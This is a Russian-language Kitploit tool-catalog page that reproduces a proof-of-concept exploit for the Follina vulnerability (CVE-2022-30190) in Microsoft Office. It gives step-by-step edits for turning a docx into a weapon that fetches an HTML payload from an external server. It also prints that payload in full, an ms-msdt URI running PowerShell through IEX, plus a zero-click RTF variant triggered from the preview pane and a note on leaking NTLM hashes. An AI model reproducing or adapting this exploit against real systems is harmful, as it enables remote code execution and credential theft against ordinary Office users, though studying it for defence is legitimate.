Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2022-30190 — Эксплойт, подтверждающий концепцию, для CVE-2022-30190 (Follina), демонстрирующий удалённое выполнение кода через специально созданные документы Microsoft Office с использованием обработчика URI ms-msdt. | Kitploit
Инструменты/GitHubGitHub/wysiiwyg/poc-cve-2022-30190
Анализ уязвимостейЭксплуатацияОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubwysiiwyg/poc-cve-2022-30190

PoC-CVE-2022-30190

Эксплойт, подтверждающий концепцию, для CVE-2022-30190 (Follina), демонстрирующий удалённое выполнение кода через специально созданные документы Microsoft Office с использованием обработчика URI ms-msdt.

Репозиторий
1224 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC CVE-2022-30190 : CVE 0-day MS Offic RCE, также известная как msdt follina

Информация : Новая 0-day уязвимость Microsoft Office используется в атаках для выполнения PowerShell

Резюме

29 мая 2022 года команда Nao_Sec, независимая группа исследователей кибербезопасности, обнаружила вредоносный документ Office, размещённый на Virustotal. Этот документ использует необычную, но известную схему для заражения своих жертв. Схема не была обнаружена как вредоносная некоторыми EDR, такими как Microsoft Defender for Endpoint. Эта уязвимость может привести к выполнению кода без необходимости взаимодействия с пользователем, поскольку она не задействует макросы, за исключением случая, когда включён режим защищённого просмотра. На данный момент номер CVE не присвоен.

Технические детали

Уязвимость эксплуатируется с использованием схемы URI MSProtocol для загрузки некоторого кода. Злоумышленники могут встраивать вредоносные ссылки в документы Microsoft Office, шаблоны или электронные письма, начинающиеся с ms-msdt:, которые будут загружены и выполнены впоследствии без взаимодействия с пользователем — за исключением случая, когда включён режим защищённого просмотра. Тем не менее, преобразование документа в формат RTF также может обойти функцию защищённого просмотра.

Подтверждение концепции

Файлы MS Office docx могут содержать внешние ссылки на OLE-объекты в виде HTML-файлов. Существует HTML-схема "ms-msdt:", которая вызывает диагностический инструмент msdt, способный выполнять произвольный код (заданный в параметрах).

В результате получается устрашающий вектор атаки для получения RCE при открытии вредоносных файлов docx (без использования макросов).

Вот шаги для создания Proof-of-Concept docx:

  1. Откройте Word (использовалась актуальная версия 2019 Pro, 16.0.10386.20017), создайте фиктивный документ, вставьте (OLE) объект (как растровое изображение), сохраните его в формате docx.

  2. Отредактируйте word/_rels/document.xml.rels в структуре docx (это обычный zip). Измените XML-тег <Relationship> с атрибутом

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

и Target="embeddings/oleObject1.bin", изменив значение Target и добавив атрибут TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Обратите внимание на значение Id (вероятно, это "rId5").

  1. Отредактируйте word/document.xml. Найдите тег <o:OLEObject ..> (с r:id="rId5") и измените атрибут с Type="Embed" на Type="Link", а также добавьте атрибут UpdateMode="OnCall".

ПРИМЕЧАНИЕ. Созданный вредоносный docx почти такой же, как для CVE-2021-44444.

  1. Разместите HTML-пейлоад PoC (запускающий calc.exe) со схемой ms-msdt по адресу http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Обратите внимание:

  • строка комментария с AAA должна повторяться более 60 раз (минимум 4096 байт).
  • Как минимум, два перехода по каталогам /../ требовались в начале параметра IT_BrowseForFile.
  • Код, заключённый в $(), будет выполнен через PowerShell, но пробелы нарушат его.
  • “.exe” должна быть последней завершающей строкой в конце параметра IT_BrowseForFile.

Кроме того, срабатывающий пейлоад может обращаться к удалённым ресурсам. Хотя это вряд ли приведёт к запуску недоверенного двоичного файла, соединение всё равно будет передавать NTLM-хэши (что означает, что злоумышленники теперь имеют хэш пароля Windows жертвы), которые могут быть использованы противником для дальнейшей постэксплуатации.

БОНУС (RTF-версия без кликов)

Если вы также добавите эти элементы внутри элемента <o:OLEObject> в word/document.xml на шаге 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

то это будет работать также и как RTF (откройте полученный docx и сохраните его как RTF).

С RTF нет необходимости открывать файл в Word, достаточно перейти к файлу и просмотреть его в области предварительного просмотра. Область предварительного просмотра запускает внешний HTML-пейлоад, и RCE достигается без каких-либо кликов.

Источники :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (оригинальный код)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (дополнительная информация)
Скачать инструмент